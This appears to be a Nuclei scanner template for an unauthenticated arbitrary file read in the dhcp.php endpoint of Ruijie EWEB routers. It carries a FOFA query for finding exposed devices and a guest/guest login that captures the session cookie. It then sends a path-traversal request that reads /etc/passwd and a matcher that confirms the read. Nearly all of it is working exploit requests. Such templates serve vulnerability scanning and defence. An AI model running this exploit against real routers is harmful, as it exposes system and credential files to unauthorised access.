id: ruijieEWEB-dhcp_php-File-reading

info:
  name: 锐捷EWEB路由器 dhcp.php 任意文件读取漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: title="锐捷网络-EWEB网管系统"
    锐捷EWEB路由器 dhcp.php 任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
  reference:
    - https://mp.weixin.qq.com/s/THJafWoAhbObgoijcYGCRw
  tags: File reading

http:
  - raw:
      - |
        POST /ddi/server/login.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
        Content-Type: application/x-www-form-urlencoded

        username=guest&password=guest?
    extractors:
      - type: regex
        part: header
        name: RUIJIEID
        group: 1
        regex:
          - 'RUIJIEID=(.*?);'
        internal: true
  - raw:
      - |
        POST /ddi/server/dhcp.php?a=csv HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
        Cookie: {{RUIJIEID}}
        Content-Type: application/x-www-form-urlencoded

        filePath=../../../../../etc/passwd
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0'
      - type: status
        status: 
          - 200